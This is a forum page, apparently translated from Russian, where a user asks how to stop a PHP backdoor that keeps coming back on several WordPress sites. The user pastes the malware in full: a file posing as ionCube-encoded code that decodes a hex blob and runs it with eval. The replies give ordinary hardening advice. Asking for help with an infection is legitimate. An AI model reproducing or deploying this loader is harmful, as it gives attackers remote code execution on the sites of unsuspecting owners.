Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
V
V
vangelder2018-03-23 14:12:43
Malware
vangelder, 2018-03-23 14:12:43

How to get rid of the shell on Wordpress sites?

Good afternoon,
The situation is as follows:
There is a shared hosting, it contains about 10 sites on WordPress. All sites have a plugin for protecting against viruses and all sorts of rubbish Wordfence . When scanning sites, this plugin swears at files like xxxxx.php, files can be located anywhere (in the plugin folders, themes, wordpress folders). The file contains the following code:

the code
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc7a-0x7ca)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;
?>

2B4637P46bI70203dW20S41Y7O2O72N61I79H28V27E6Hc70U7K77L26Bb6X1273Fd3e27G6Y3U6
76A1Z63S6aK6f27293b24Y6M26Sa6c6a203d2S04172726R17928276a6X26d7F46dP75273d3Z
e27A7Z77I2I62777172272T93Lb66O6fV726561K6X36M8L20L2Z841H72726J17928246Q3746
Tb702Jc2N0245Lf504f53542c202S4Q62O6aC6Ic6aR2EcV2P0245Qf4E3P4fV4Pf4b494529Z2
B0K61732024H64F72W646362X65Z2E92C0Q7bO6H66Nf7265616I36C8202C8L2C464E7C26I4Y
636I265B2L06R173A20246eC616168203dO3Qe2024P696Nb6175T77G2920Z7DbJ2469V6bK61
75772H0K3dK204070O6163R6Lb2822Z482a22R2c2N0246X9X6b61K75F77293b246e616D16B8
20Z2Re3Ud20F22U31393766A3Z03X932362d6666616L6Q2dT34L3X46J63D0O2Xd6Q1Z3L5J3L
5652JdX3H3L6131393K53Y6S3039B36396Z33722V3b246A9B666Ub6H5662K0J3Yd20I24I69Z
6Qb6O175772C05e2N0C7J3756T2T7P3747T2E2T87E3M74Q725f7C265K7065617428Z246e6C1
S61O682AcD20N287X374726c6C5L6Te2824696Cb617U5Y7K729D2V02f2073747D2Z6Lc6K5L6
eW28Y24I6e616H16I82929W2S02b2T0D31U2M92c203H02c2D07E37472M6BcO656e28H2L4696
b6F1C75Z772E9293b2469O6P66Vb6566203Od206578H70M6c6f646Q52V82P223T222cS2X024
6F9G66T6Hb6N5662A9W3Pb696J620R2F86X36fJ756e742824E6Y9W666b6W5T6D62D9G2Y03dQ
3Fd2K0Q33H2W92E07b65R7L661C6c2F8V246966T6Jb65665bP3Y15d282469666b65D6V6J5b3
25Rd2929V3b65W7E8697U4F2J8S2Y93b7Ed7Pd7d


Files with such content have a different date of creation (they can be dated a month ago or a year ago, etc.), i.e. It is impossible to trace where he came from.
After scanning the sites with the WordFence plugin and deleting all these files, there was silence for a couple of days. And then everything starts again - files appear and WordFence starts to swear.
Something similar is described here - Virus on WordPress site? - and scanning helped there, replacing passwords to the database, and user passwords. In my case it does NOT work. As I said, in a couple of days everything starts again.
Maybe someone knows an effective solution to this ailment.
Thank you in advance.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

4 answer(s)
Report
N
Nikolay, 2018-03-23
@iNickolay

Maybe someone knows an effective solution to this ailment.

Of course we know: we need to find the virus and remove it.

Report
R
Roman Mirilaczvili, 2018-03-23
@2ord

In general, the whole WP platform is full of holes, as well as a bunch of plugins written on it.
You can try some solutions:

  1. install only proven modules for WP
  2. at a minimum, keep all software always up-to-date (OS + Apache/Nginx/etc + WP + modules) - latest versions with fixes for known CVE vulnerabilities.
  3. correctly configure the web server (including upload), file and folder access rights, firewall, DBMS
  4. use additional WAF

Report
R
Ruslan, 2018-03-23
@Dvlbug

Create a new server, transfer only Wordpress to it. Compare hashes with the original distribution.
Install Tripwire and Roothunter, prohibit execution + check folder permissions.

Report
S
SunHere, 2018-05-03
@SunHere

No plugins can help you find viruses with 100% certainty, which says Ai-bolit skips virus files. Only a combined approach with checks by bases and gender manual check gives a good result

Similar questions
A
Alexey Kislitsyn2015-11-30 10:36:53
Why does the laptop lay down the wireless network it gets into? 7Reply
K
Khangeldy Ilebaev2015-04-20 09:15:33
How to open all links in multiple sites? 2Reply
Q
QQ2015-12-10 17:00:29
How to remove your site from malwaredomains.com? 1Reply
B
bxspb2021-08-09 14:46:14
What is the type of virus with 4 questions on websites, how does it work? 2Reply
F
Frelsie2015-12-15 17:08:40
Virus or not virus? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question